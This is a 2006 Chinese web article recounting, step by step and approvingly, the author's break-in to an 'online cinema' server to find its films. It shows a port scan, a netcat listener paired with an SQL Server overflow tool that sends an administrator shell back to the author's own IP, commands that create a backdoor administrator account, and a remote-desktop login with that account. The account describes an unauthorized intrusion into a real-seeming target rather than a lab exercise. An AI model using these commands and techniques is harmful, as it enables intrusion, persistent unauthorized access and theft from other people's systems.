WEB开发网
开发学院网络安全黑客技术 黑客入侵“在线影院”全过程 阅读

黑客入侵“在线影院”全过程

 2006-11-05 19:59:23 来源:WEB开发网   
核心提示: 破门:久违的溢出工具用X-Scan对该站点的Server扫描结果出来了,开的端口还不少呢:53、80、1433、3389,黑客入侵“在线影院”全过程(2),可并没有报告说发现有弱口令,看来网管还算比较有责任心,这台机器一共就C盘和D盘两个盘,容量加到一起也才20GB,但开了3389端口,意

破门:久违的溢出工具

用X-Scan对该站点的Server扫描结果出来了,开的端口还不少呢:53、80、1433、3389。可并没有报告说发现有弱口令,看来网管还算比较有责任心。但开了3389端口,意味着可以远程登录,这可是微软给所有Windows用户献上的最大的“木马”。

通过观察,我发现只有在1433端口上下点工夫,想想办法。何不用SQL2溢出工具试试?

先开一个cmd窗口,祭出宝刀netcat,在命令提示符下敲入“netcat -l -p 99”,监听本地99端口。接着该SQL2出马了。再打开一个cmd窗口,键入“sql2 218.147.*.* 61.157.*.* 0”,其中218.147.*.*是对方IP,61.157.*.*是我自己的IP,回车后提示package sent successful。再回过头去看看监听本地端口的netcat,已经变成了C:WinNTsystem32\_,这就是对方机器的系统文件夹了,看来是成功溢出了,就这么简单。

我很幸运地得到了对方的一个Shell,而且还是administrator权限的。接下来的操作就轻车熟路了,添加用户,提升权限:在提示符下键入“net user hacker 12345 /add”(在对方机器里创建一个名为hacker,密码为12345的用户),再键入“net localgroup administrators hacker /add”(把用户hacker加入到管理员组),接下来就该是3389远程登录了。

遇阻:寻找VOD电影

首先运行Windows XP自带远程登录器mstsc.exe,填入对方的IP地址218.147.*.*,确定后在登录界面填上我刚创建的用户名hacker和密码12345,顺利地进入了对方的Windows 2000桌面。

可随后的情况让我呆住了,这台机器一共就C盘和D盘两个盘,容量加到一起也才20GB,这个容量是不可能装下上百部电影的,我要的VOD电影在哪里?

Tags:黑客 入侵 在线影院

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接